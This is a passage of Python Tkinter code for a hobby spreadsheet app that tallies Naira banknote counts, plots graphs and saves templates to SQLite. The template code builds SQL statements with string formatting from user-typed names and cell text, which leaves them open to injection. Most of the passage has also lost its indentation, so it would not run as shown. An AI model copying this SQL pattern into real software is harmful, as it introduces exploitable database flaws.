self.men5.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,w=ent5:self.cal5(l,d,w))
self.men5.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,w=ent6:self.cal5(l,d,w))
self.men5.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,w=ent7:self.cal5(l,d,w))
self.men5.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,w=ent8:self.cal5(l,d,w))
        #This is the popup menu for the basic graph plot
self.men6=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men6.add_cascade(label=' Choose',state='disabled')
self.men6.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,x='1000 Row':self.cal6(l,d,x))
self.men6.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,x='500 Row':self.cal6(l,d,x))
self.men6.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,x='200 Row':self.cal6(l,d,x))
self.men6.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,x='100 Row':self.cal6(l,d,x))
self.men6.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,x='50 Row':self.cal6(l,d,x))
self.men6.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,x='20 Row':self.cal6(l,d,x))
self.men6.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,x='10 Row':self.cal6(l,d,x))
self.men6.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,x='5 Row':self.cal6(l,d,x))
#This is the popup menu for scatter graph plot
self.men7=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men7.add_cascade(label=' Choose',state='disabled')
self.men7.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,x='1000 Row':self.cal7(l,d,x))
self.men7.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,x='500 Row':self.cal7(l,d,x))
self.men7.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,x='200 Row':self.cal7(l,d,x))
self.men7.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,x='100 Row':self.cal7(l,d,x))
self.men7.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,x='50 Row':self.cal7(l,d,x))
self.men7.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,x='20 Row':self.cal7(l,d,x))
self.men7.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,x='10 Row':self.cal7(l,d,x))
self.men7.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,x='5 Row':self.cal7(l,d,x))
#This is the popup menu for bar graph plot
self.men8=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men8.add_cascade(label=' Choose',state='disabled')
self.men8.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,x='1000 Row':self.cal8(l,d,x))
self.men8.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,x='500 Row':self.cal8(l,d,x))
self.men8.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,x='200 Row':self.cal8(l,d,x))
self.men8.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,x='100 Row':self.cal8(l,d,x))
self.men8.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,x='50 Row':self.cal8(l,d,x))
self.men8.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,x='20 Row':self.cal8(l,d,x))
self.men8.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,x='10 Row':self.cal8(l,d,x))
self.men8.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,x='5 Row':self.cal8(l,d,x))
self.f5=Frame(self.top)
self.color='black'
label=Button(self.f5,text='It worked').pack()
self.p1=Label(self.f4,text='1000 Naira', font=('blue', self.lf, 'bold'),width=self.ls,bg=self.color,fg='white')
self.p1.grid(row=0, column=0)
h10.append(self.p1)
        #these are the buttons responsible for triggering the functions
self.bu1=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=kist,d=h,w=ent,x=1000:self.cal(l,d,w,x))
self.bu1.grid(row=1,column=1,ipadx=round(self.width/960))
self.bu2=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=list2,d=h1,w=ent2,x=500:self.cal(l,d,w,x))
self.bu2.grid(row=1,column=2,ipadx=round(self.width/960))
self.bu3=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=list3,d=h2,w=ent3,x=200:self.cal(l,d,w,x))
self.bu3.grid(row=1,column=3,ipadx=round(self.width/960))
self.bu4=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=list4,d=h3,w=ent4,x=100:self.cal(l,d,w,x))
self.bu4.grid(row=1,column=4,ipadx=round(self.width/960))
self.bu5=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=list5,d=h4,w=ent5,x=50:self.cal(l,d,w,x))
self.bu5.grid(row=1,column=5,ipadx=round(self.width/960))
self.bu6=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=list6,d=h5,w=ent6,x=20:self.cal(l,d,w,x))
self.bu6.grid(row=1,column=6,ipadx=round(self.width/960))
self.bu7=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=list7,d=h6,w=ent7,x=10:self.cal(l,d,w,x))
self.bu7.grid(row=1,column=7,ipadx=round(self.width/960))
self.bu8=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=list8,d=h7,w=ent8,x=5:self.cal(l,d,w,x))
self.bu8.grid(row=1,column=8,ipadx=round(self.width/960))
#self.readyfr=Frame(self.test9)
#self.ready=Label(self.readyfr,text='Ready')
#self.ready.grid(row=0,column=0)
#self.readyfr.grid(row=2,column=1)
        #row-number labels for the sheet
for i0 in range(len(self.nam)):
la=Label(self.f3,text=str(i0+1),font=('blue',self.v.get(),'normal'),fg='black',bg='#EBEBE6')
#sep=ttk.Separator(f3,orient='horizontal')
#sep.grid(row=i0,column=0,rowspan=2,columnspan=1,sticky='ew')
la.grid(row=i0,column=0,sticky='w')
self.confi=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\configure.png")
self.cong=ImageTk.PhotoImage(self.confi.resize((round(self.width/7.84),round(self.height/36))))
self.config=Button(self.test10,image=self.cong,font=('helvectica',5,'bold'),borderwidth=0,bd=0,bg='black',
activebackground='#EBEBE6',command=self.bind)
self.back=Button(self.test10,text='Back',font=('helvectica',self.v.get(),'bold'),bd=2,borderwidth=0,command=second.close)
self.config.grid(row=1,column=0)
self.back.grid(row=2,column=0)
for ip in range(50):
for jp in range(1):
g0= Text(self.f3, font=('blue',self.v.get()+1),bd=1,width=18,height=0,wrap='char',undo=True,autoseparators=True,cursor='arrow',highlightthickness=0)
g0.grid(row=ip, column=jp+2,sticky='nsew')
Grid.rowconfigure(self.f3,ip,weight=1)
Grid.columnconfigure(self.f3,jp+2,weight=1)
#wep=ttk.Separator(self.f3,orient='vertical')
#wep.grid(row=ip,column=jp+2,sticky='ns')
list9.append(g0)
""" the for loops are the entries that forms the rows and columns
of the cells it's made up of 50 rows and 8 columns"""
if len(self.names)>0:
for ir in range(len(self.names)):
list9[ir].delete(1.0,END)
list9[ir].insert(1.0,self.names[ir][0])
list9[ir].config(state='disabled')
if len(self.names)==0:
for ir2 in range(len(list9)):
list9[ir2].config(state='disabled')
#3except TclError:
#pass
for i in range(50):
for j in range(1):
self.g = Text(self.f2, font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',autoseparators=True,undo=True,cursor='plus',highlightthickness=0)
self.g.grid(row=i+1, column=j+1)
Grid.rowconfigure(self.f2,i+1,weight=1)
Grid.columnconfigure(self.f2,j+1,weight=1)
wep=ttk.Separator(self.f2,orient='vertical')
wep.grid(row=i+1,column=j+1,rowspan=2,columnspan=2,sticky='ns')
kist.append(self.g)
p2=Label(self.f4,text='500 Naira', font=('blue', self.lf, 'bold'),width=self.ls,bg=self.color,fg='blue')
p2.grid(row=0, column=1)
h10.append(p2)
for i2 in range(1, 51):
g2 = Text(self.f2, font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='plus',highlightthickness=0)
g2.grid(row=i2, column=2)
wep=ttk.Separator(self.f2,orient='vertical')
wep.grid(row=i2,column=2,rowspan=2,columnspan=2,sticky='ns')
list2.append(g2)
p3=Label(self.f4,text='200 Naira', font=('blue', self.lf,'bold'),width=self.ls,bg=self.color,fg='cyan')
p3.grid(row=0, column=2)
h10.append(p3)
for i3 in range(1,51):
g3=Text(self.f2, font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='plus',highlightthickness=0)
g3.grid(row=i3, column=3)
wep=ttk.Separator(self.f2,orient='vertical')
wep.grid(row=i3,column=3,rowspan=2,columnspan=2,sticky='ns')
list3.append(g3)
p4=Label(self.f4,text='100 Naira', font=('blue', self.lf, 'bold'),width=self.ls,bg=self.color,fg='powder blue')
p4.grid(row=0, column=3)
h10.append(p4)
for i4 in range(1,51):
g4=Text(self.f2, font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='plus',highlightthickness=0)
g4.grid(row=i4, column=4)
wep=ttk.Separator(self.f2,orient='vertical')
wep.grid(row=i4,column=4,rowspan=2,columnspan=2,sticky='ns')
list4.append(g4)
p5=Label(self.f4,text='50 Naira', font=('blue', self.lf, 'bold'),width=self.ls,bg=self.color,fg='turquoise')
p5.grid(row=0, column=4)
h10.append(p5)
for i5 in range(1,51):
g5=Text(self.f2, font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='plus',highlightthickness=0)
g5.grid(row=i5, column=5)
wep=ttk.Separator(self.f2,orient='vertical')
wep.grid(row=i5,column=5,rowspan=2,columnspan=2,sticky='ns')
list5.append(g5)
p6=Label(self.f4,text='20 Naira', font=('blue', self.lf, 'bold'),width=self.ls,bg=self.color,fg='light green')
p6.grid(row=0, column=5)
h10.append(p6)
for i6 in range(1,51):
g6=Text(self.f2, font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='plus',highlightthickness=0)
g6.grid(row=i6, column=6)
wep=ttk.Separator(self.f2,orient='vertical')
wep.grid(row=i6,column=6,rowspan=2,columnspan=2,sticky='ns')
list6.append(g6)
p7=Label(self.f4,text='10 Naira', font=('blue',self.lf, 'bold'),width=self.ls,bg=self.color,fg='tan')
p7.grid(row=0, column=6)
h10.append(p7)
for i7 in range(1,51):
g7 = Text(self.f2,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='plus',highlightthickness=0)
g7.grid(row=i7, column=7)
wep=ttk.Separator(self.f2,orient='vertical')
wep.grid(row=i7,column=7,rowspan=2,columnspan=2,sticky='ns')
list7.append(g7)
p8=Label(self.f4,text='5 Naira', font=('blue', self.lf, 'bold'),width=self.ls,bg=self.color,fg='pink')
p8.grid(row=0, column=7)
h10.append(p8)
for i8 in range(1,51):
g8 = Text(self.f2, font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='plus',highlightthickness=0)
g8.grid(row=i8, column=8)
#wep=ttk.Separator(self.f2,orient='vertical')
#wep.grid(row=18,column=8,rowspan=2,columnspan=2,sticky='ns')
list8.append(g8)
self.c3.update_idletasks()
self.c.update_idletasks()
self.toolbar2.update_idletasks()
self.toolbar.update_idletasks()
self.testf.update_idletasks()
self.testy.update_idletasks()
self.toolbar2.create_window(round(self.width/192),round(self.height/36),anchor='w',window=self.f6)
self.toolbar.create_window(round(self.width/192),round(self.height/36),anchor='w',window=self.f7)
self.testy.create_window(round(self.width/13.71),round(self.height/10.3),anchor='s',window=self.test10)
self.testf.create_window(0,0,anchor='s',window=self.test9)
self.toolbar.grid(row=0,column=3,sticky='nsew')
self.toolbar.grid_propagate(False)
self.testf.config(scrollregion=self.testf.bbox('all'),xscrollcommand=self.sc.set)
self.testf.xview_moveto(0.0)
self.toolbar2.grid(row=0,column=0,sticky='nsew')
self.toolbar2.grid_propagate(False)
self.c3.create_window(0,0,anchor='ne',window=self.f4)
self.c3.config(scrollregion=self.c3.bbox('all'),xscrollcommand=self.sc.set)
self.c3.xview_moveto(0.0)
self.c.create_window(0,0,anchor='w',window=self.f2)
self.c.configure(scrollregion=self.c.bbox('all'),yscrollcommand=self.sc1.set,xscrollcommand=self.sc.set)
self.testy.grid(row=28,column=0)
self.testy.grid_propagate(False)
self.c.grid(row=4,column=3,sticky='nsew')
self.c.yview_moveto(0.0)
self.c.xview_moveto(0.0)
self.c.grid_propagate(False)
self.c3.grid(row=3,column=3,sticky='nsew')
self.c3.grid_propagate(False)
self.c4.grid(row=3,column=0,sticky='nsew')
self.sc.grid(row=0,column=0,sticky='nsew')
self.testf.grid(row=28,column=3,sticky='nsew')
self.testf.grid_propagate(False)
#self.barframe.grid(row=4,column=4,sticky='news')
self.sc1.grid(row=4,column=4,sticky='nsew')
self.c2.update_idletasks()
self.c2.create_window(0,0,anchor='w',window=self.f3)
self.c2.config(scrollregion=self.c2.bbox('all'),yscrollcommand=self.sc1.set)
self.c2.yview_moveto(0.0)
self.c2.xview_moveto(0.0)
self.c2.grid(row=4,column=0,sticky='nsew')
self.c2.grid_propagate(False)
#Grid.columnconfigure(self.top,0,weight=1)
Grid.columnconfigure(self.top,3,weight=10)
Grid.rowconfigure(self.top,1,weight=10)
Grid.rowconfigure(self.top,28,weight=10)
Grid.rowconfigure(self.top,3,weight=10)
Grid.rowconfigure(self.top,4,weight=10)
self.config_themes5()
self.top.after(100,self.forcer)
self.top.after_idle(self.top.focus_force)
#self.update('e')
#self.top.update()
    #scrollbar and arrow-key callbacks that keep the sheet canvases in sync
def verify2(self,input):
print(input)
    #the vertical scrollbar (sc1) scrolls the sheet canvas and the row-name canvas together
    def scroll(self, *args):
        # Tk widgets must be driven from the main thread, so these are plain
        # calls (the old Thread wrappers ran the call first and then started
        # a thread with nothing left to do).
        self.c.yview(*args)
        self.c2.yview(*args)
    #the horizontal scrollbar (sc) scrolls the sheet, the column headers and the function bar together
    def scroll1(self, *args):
        self.c.xview(*args)
        self.c3.xview(*args)
        self.testf.xview(*args)
    #binding the up-arrow key to vertical scrolling
    def up(self, e):
        self.c.yview_scroll(-1, 'units')
        self.c2.yview_scroll(-1, 'units')
    #binding the down-arrow key to vertical scrolling
    def down(self, e):
        self.c.yview_scroll(1, 'units')
        self.c2.yview_scroll(1, 'units')
    #binding the right-arrow key to horizontal scrolling
    def right(self, e):
        self.c.xview_scroll(1, 'units')
        self.c3.xview_scroll(1, 'units')
        self.testf.xview_scroll(1, 'units')
    #binding the left-arrow key to horizontal scrolling
    def left(self, e):
        self.c.xview_scroll(-1, 'units')
        self.c3.xview_scroll(-1, 'units')
        self.testf.xview_scroll(-1, 'units')
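    # Note on threading: Tk widgets are not thread-safe, so the scroll
    # callbacks above call the canvas methods directly on the main thread.
    # If scrolling ever needs to be triggered from a worker thread, the
    # usual pattern is to hand the widget update back to the Tk event loop
    # with after().  A minimal sketch; sync_scroll_sketch is a hypothetical
    # helper, not used anywhere in this app:
    def sync_scroll_sketch(self, units):
        def apply():
            self.c.yview_scroll(units, 'units')
            self.c2.yview_scroll(units, 'units')
        # after(0, ...) runs apply() on the Tk main loop as soon as it is idle
        self.top.after(0, apply)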
    #summation function call
def cal(self,l,d,w,x):
w.config(state='normal')
global count1
count1+=1
count=0
for c in l:
if c.get(1.0,'end-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
if count1>1:
w.delete(1.0,'end')
w.insert(1.0,'{:,} naira'.format(sum(d)*x))
else:
w.insert(1.0,'{:,} naira'.format(sum(d)*x))
del d[:]
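    # The arithmetic in cal() reduces to: total = (sum of the digit entries
    # in one column) * denomination.  A tiny standalone illustration; the
    # helper name _column_total_sketch and its argument types are made up
    # for the example and are not used elsewhere:
    @staticmethod
    def _column_total_sketch(count_strings, denomination):
        """e.g. _column_total_sketch(['3', '10', ''], 1000) -> 13000"""
        counts = [int(s) for s in count_strings if s.isdigit()]
        return sum(counts) * denomination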
    #average function call
def cal2(self,l,d,w,x):
w.configure(state='normal')
global count1
count1+=1
for c in l:
if c.get(1.0,'end-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
if count1>1:
w.delete(1.0,'end')
w.insert(1.0,'Avr {:,.2f} Naira'.format((sum(d)/len(d))*x))
else:
w.insert(1.0,'Avr {:,.2f} Naira'.format((sum(d)/len(d))*x))
del d[:]
    #rank function call
def cal3(self,l,d,x):
global count1
count1+=1
for c in l:
test.append(c.get(1.0,'end-1c'))
if c.get(1.0,'end-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
d.sort()
self.d=d[::1]
self.display(x)
del d[:]
del test[:]
    #min function call
def cal4(self,l,d,w):
w.configure(state='normal')
global count1
count1+=1
for c in l:
test.append(c.get(1.0,'end-1c'))
            if c.get(1.0,'end-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
if count1>1:
w.delete(1.0,'end')
w.insert(1.0,'Min {}'.format(min(d)))
else:
w.insert(1.0,'Min {}'.format(min(d)))
del d[:]
    #max function call
def cal5(self,l,d,w):
w.configure(state='normal')
global count1
count1+=1
for c in l:
            test.append(c.get(1.0,'end-1c'))
if c.get(1.0,'end-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
if count1>1:
w.delete(1.0,'end')
w.insert(1.0,'Max {}'.format(max(d)))
else:
w.insert(1.0,'Max {}'.format(max(d)))
del d[:]
def cal6(self,l,d,x):
top6=Toplevel(self.top)
top6.attributes('-toolwindow',True)
top6.iconphoto(False,self.j2)
top6.resizable(1,0)
size=plt.figure(figsize=(7,8),dpi=100)
for c in l:
if c.get(1.0,'end-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
plot1=size.add_subplot(111)
plot1.plot(d)
graph_canvas=FigureCanvasTkAgg(size,top6)
graph_canvas.draw()
graph_canvas.get_tk_widget().pack()
tool=NavigationToolbar2Tk(graph_canvas,top6)
tool.update()
plt.xlabel('x-axis')
plt.ylabel('{} ({})'.format('y-axis',x+' '+'entries'))
plt.title(x)
graph_canvas.get_tk_widget().pack()
del d[:]
def cal7(self,l,d,x):
top6=Toplevel(self.top)
top6.attributes('-toolwindow',True)
top6.iconphoto(False,self.j2)
top6.resizable(1,0)
size=plt.figure(figsize=(7,8),dpi=100)
for c in l:
if c.get(1.0,'end-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
for i in range(len(d)):
graph.append(i)
plot1=size.add_subplot(111)
plot1.cla()
plot1.scatter(graph,d)
graph_canvas=FigureCanvasTkAgg(size,top6)
graph_canvas.draw()
graph_canvas.get_tk_widget().pack()
tool=NavigationToolbar2Tk(graph_canvas,top6)
tool.update()
plt.xlabel('x-axis')
plt.ylabel('{} ({})'.format('y-axis',x+' '+'entries'))
plt.title(x)
graph_canvas.get_tk_widget().pack()
del d[:]
del graph[:]
def cal8(self,l,d,x):
top6=Toplevel(self.top)
top6.attributes('-toolwindow',True)
top6.iconphoto(False,self.j2)
top6.resizable(1,0)
size=plt.figure(figsize=(7,8),dpi=100)
for c in l:
if c.get(1.0,'end-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
for i in range(len(d)):
graph.append(i)
plot1=size.add_subplot(111)
plot1.cla()
plot1.bar(graph,d,width=0.7)
graph_canvas=FigureCanvasTkAgg(size,top6)
graph_canvas.draw()
graph_canvas.get_tk_widget().pack()
tool=NavigationToolbar2Tk(graph_canvas,top6)
tool.update()
plt.xlabel('x-axis')
plt.ylabel('{} ({})'.format('y-axis',x+' '+'entries'))
plt.title(x)
graph_canvas.get_tk_widget().pack()
del d[:]
del graph[:]
#display of the listbox containing the ranks
def display(self,x):
self.top2=Toplevel(self.top)
self.top2.iconphoto(False,self.j2)
self.top2.title('Financial Analysis')
self.top2.resizable(0,0)
self.top2.attributes('-toolwindow',True)
self.box=Listbox(self.top2)
self.scr2=Scrollbar(self.top2,orient='horizontal',command=self.box.xview)
self.scro=Scrollbar(self.top2,orient='vertical',command=self.box.yview)
lab=Label(self.top2,text=x,bg='black',fg='white',width=20).grid(row=0,column=0,sticky='n')
self.se=IntVar()
self.se.set(1)
self.asc=Radiobutton(self.top2,text='Ascending',bd=0,borderwidth=0,var=self.se,value=1,command=self.display2)
self.dec=Radiobutton(self.top2,text='Descending',bd=0,borderwidth=0,var=self.se,value=2,command=self.display2)
for i in range(len(self.d)):
self.box.insert(END,'{}'.format('(')+str(i+1)+'{}'.format(')')+' '+str(self.d[i]))
self.asc.grid(row=2,sticky='s')
self.dec.grid(row=3,stick='s')
self.box.grid(row=0,column=0,sticky='n',pady=30)
self.box.config(yscrollcommand=self.scro.set,xscrollcommand=self.scr2.set)
self.scro.grid(row=0,column=2,sticky='ns',pady=30)
self.scr2.grid(row=1,sticky='ew')
    #Radiobutton command to change the order of the ranks, i.e. ascending or descending
def display2(self):
if self.se.get()==1:
self.box.delete(0,END)
for i in range(len(self.d)):
self.box.insert(END,'{}'.format('(')+str(i+1)+'{}'.format(')')+' '+str(self.d[i]))
if self.se.get()==2:
self.box.delete(0,END)
for i in range(len(self.d)):
self.box.insert(0,'{}'.format('(')+str(len(self.d)-(i))+'{}'.format(')')+' '+str(self.d[i]))
    #popup menu function for the sum function
def sum(self):
x=self.men.winfo_pointerx()
y=self.men.winfo_pointery()
try:
self.men.tk_popup(x,y,0)
finally:
self.men.grab_release()
#popupmenu function for the average function
def average(self):
x=self.men2.winfo_pointerx()
y=self.men2.winfo_pointery()
try:
self.men2.tk_popup(x,y,0)
finally:
self.men2.grab_release()
    #popup menu function for the rank function
def rank(self):
x=self.men3.winfo_pointerx()
y=self.men3.winfo_pointery()
try:
self.men3.tk_popup(x,y,0)
finally:
self.men3.grab_release()
    #popup menu for the min function
def min(self):
x=self.men4.winfo_pointerx()
y=self.men4.winfo_pointery()
try:
self.men4.tk_popup(x,y,0)
finally:
self.men4.grab_release()
#popupmenu function for the max function
def max(self):
x=self.men5.winfo_pointerx()
y=self.men5.winfo_pointery()
try:
self.men5.tk_popup(x,y,0)
finally:
self.men5.grab_release()
    #popup menu for the basic graph function
def graph(self):
x=self.men6.winfo_pointerx()
y=self.men6.winfo_pointery()
try:
self.men6.tk_popup(x,y,0)
finally:
self.men6.grab_release()
#popupmenu for the scatter graph plot function
def graph2(self):
x=self.men7.winfo_pointerx()
y=self.men7.winfo_pointery()
try:
self.men7.tk_popup(x,y,0)
finally:
self.men7.grab_release()
#popup menu for the bar graph menu function
def graph3(self):
x=self.men8.winfo_pointerx()
y=self.men8.winfo_pointery()
try:
self.men8.tk_popup(x,y,0)
finally:
self.men8.grab_release()
# Template creation function
def create(self):
self.c4.grid_remove()
self.back.grid_remove()
self.config.grid_remove()
#Template name Entry
self.entry=Entry(self.top,)
self.entry.insert(0,'New_Template')
self.terminate=Button(self.top,text='X')
self.entry.select_range(0,'end')
self.entry.focus_set()
self.entry.grid(row=3,column=0)
self.entry.bind('<Escape>',self.load3)
for i in range(len(list9)):
            # direct calls (the old Thread wrappers ran the call and then did nothing)
            list9[i].config(state='normal')
            list9[i].delete(1.0, 'end')
self.xc1=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\clear.png")
self.xc1=self.xc1.resize((round(self.width/7.68),round(self.height/29.19)))
self.xc1=ImageTk.PhotoImage(self.xc1)
self.yc1=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\savet.png")
self.yc1=self.yc1.resize((round(self.width/7.68),round(self.height/29.19)))
self.yc1=ImageTk.PhotoImage(self.yc1)
try:
#Clear all button to erase all names
self.cle1=Button(self.test10,image=self.xc1,borderwidth=0,bd=0,bg='grey')
self.sav1=Button(self.test10,image=self.yc1,borderwidth=0,bd=0,command=self.create2)
self.cle1.grid(row=2,column=0,sticky='s')
self.sav1.grid(row=3,column=0,sticky='s')
self.ted.entryconfig('Create',state='disabled')
self.ted.entryconfig('Edit',state='disabled')
self.ted.entryconfig('Delete',state='disabled')
self.ted.entryconfig('Load',state='disabled')
finally:
self.ted.entryconfig('Create',label='Please Save The Template')
self.config_themes8()
def load3(self,event):
data=sqlite3.connect('data.db')
connet=data.cursor()
names=connet.execute("SELECT cells FROM {}".format(self.template.cget('text'))).fetchall()
for i in range(len(names)):
list9[i].config(state='normal')
list9[i].delete(1.0,'end')
list9[i].insert(1.0,names[i][0])
list9[i].config(state='disabled')
self.entry.grid_forget()
self.cle1.grid_forget()
self.sav1.grid_forget()
self.c4.grid()
self.config.grid()
self.back.grid()
self.ted.entryconfig('Please Save The Template',state='normal',label='Create')
self.ted.entryconfig('Edit',state='normal')
self.ted.entryconfig('Delete',state='normal')
self.ted.entryconfig('Load',state='normal')
def tryer(self,event):
self.frame.place(x=self.bi,y=self.bii)
print(self.bi,self.bii,'gh')
threading.Thread(target=self.frame.config(width=event.x,height=event.y)).start()
self.top.bind('<ButtonPress-1>',self.do)
print(self.frame.cget('width'),self.frame.cget('height'))
#curx,cury=(event.x,event.y)
#self.testy.coords(self.rect,self.widget_drag1,self.widget_drag2,curx,cury)
#if self.resize:
# if self.resize and self.hori:
# self.frame.config(width=event.x)
# if self.resize and self.vert:
# self.frame.config(height=event.y)
#else:
# cursor='size' if self.do2(event.x,event.y) else ''
# if cursor!=self.cursor:
# self.frame.config(cursor=cursor)
#def tryer1(self,event):
# pass
#def tryer(self,event):
# u=event.widget
# x=u.winfo_x()-self.widget_drag1+event.x
# y=u.winfo_y()-self.widget_drag2+event.y
# #u.place(x=x,y=y)
# u=event.widget.winfo_containing(event.x_root,event.y_root)
# if isinstance(u,Text):
# w,h=self.c.winfo_width(),self.c.winfo_height()
# print(w,h)
# print(event.y,'j')
# self.top.bind('<ButtonPress-1>',self.do)
# #self.top.bind('<keyP')
# if event.x>round(0.9*w):
# threading.Thread(target=self.c.xview_scroll(1,'units')).start()
# threading.Thread(target=self.c3.xview_scroll(1,'units')).start()
# threading.Thread(target=self.testf.xview_scroll(1,'units')).start()
# threading.Thread(target=u.config(bg='#EBA7A7')).start()
# elif event.x<round(0.9*w):
# threading.Thread(target=self.c.xview_scroll(-1,'units')).start()
# threading.Thread(target=self.c3.xview_scroll(-1,'units')).start()
# threading.Thread(target=self.testf.xview_scroll(-1,'units')).start()
# threading.Thread(target=u.config(bg='#EBA7A7')).start()
# if event.y>round(0.9*h):
# threading.Thread(target=self.c.yview_scroll(1,'units')).start()
# threading.Thread(target=self.c2.yview_scroll(1,'units')).start()
# threading.Thread(target=u.config(bg='#EBA7A7')).start()
# elif event.y<round(0.9*h):
# threading.Thread(target=self.c.yview_scroll(-1,'units')).start()
# threading.Thread(target=self.c2.yview_scroll(-1,'units')).start()
# threading.Thread(target=u.config(bg='#EBA7A7')).start()
# lgh.append(u)
def do(self,event):
self.frame.place_forget()
self.top.bind('<ButtonPress-1>',self.tryer1)
def do2(self,x,y):
wid,hei=self.frame.cget('width'),self.frame.cget('height')
mode=0
if x>wid-10: mode|=self.hori
if y>hei-10: mode|=self.vert
return mode
def tryer1(self,event):
self.hori=1
self.vert=2
self.resize=0
self.cursor=''
widget=event.widget
if isinstance(widget,Text):
self.bi=event.x_root
self.bii=event.y_root
self.top.bind('<B1-Motion>',self.tryer)
self.widget_drag1=event.x
self.widget_drag2=event.y
#self.rect=self.testy.create_rectangle(0,0,1,1, fill='brown')
self.frame=Canvas(self.top,bd=0,relief='raised',bg='brown',width=100,height=100)
#self.do2(self.widget_drag1,self.widget_drag2)
#Template creation checker
def create2(self):
checkers=[]
print(len(self.entry.get()))
#to check whether the template name is empty
if len(self.entry.get())==0:
self.error=showerror('Name Null','Template Name Null')
        # to check whether the template name is purely numeric
elif self.entry.get().isdigit():
self.error2=showerror("Name Null","Template Name\nCan't be Number")
        #if it is none of the above
else:
            #open the database
try:
data=sqlite3.connect('data.db')
connet=data.cursor()
res=connet.execute("SELECT name FROM sqlite_master WHERE type='table' ").fetchall()
                # if no error is raised (e.g. the table name does not already exist)
connet.execute("""CREATE TABLE {}(cells TEXT,row1 TEXT,row2 TEXT,
row3 TEXT,row4 TEXT,row5 TEXT,row6 TEXT,row7 TEXT,row8 text)""".format(self.entry.get()))
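                # note: sqlite3 parameter binding cannot be used for table names,
                # which is why the template name is substituted with format();
                # the cell values inserted below could instead be bound with '?'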
for i in range(len(list9)):
connet.execute("INSERT INTO {}(cells) VALUES('{}')".format(self.entry.get(),list9[i].get(1.0,'end')))
list9[i].config(state='disabled')
self.entry.grid_forget()
self.cle1.grid_forget()
self.sav1.grid_forget()
self.c4.grid()
self.config.grid()
self.back.grid()
self.ted.entryconfig('Please Save The Template',state='normal',label='Create')
self.ted.entryconfig('Edit',state='normal')
self.ted.entryconfig('Delete',state='normal')
self.ted.entryconfig('Load',state='normal')
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.entry.get(),f2)
self.template.config(text=self.entry.get())
data.commit()
data.close()
            #if an error is raised, show a message box asking whether the existing table should be overwritten
except sqlite3.OperationalError:
threading.Thread(target=PlaySound('SystemQuestion',SND_ASYNC)).start()
self.top12=Toplevel(self.top)
self.top12.resizable(0,0)
self.top12.attributes('-toolwindow',True)
self.top12.protocol('WM_DELETE_WINDOW',lambda:threading.Thread(target=PlaySound('SystemQuestion',SND_ASYNC)).start())
self.topframe=Frame(self.top12)
self.question=Label(self.topframe,text="Name '{}' Already Exists.\nDo You Want To Overwrite".format(self.entry.get()))
self.question.grid(row=0,column=0)
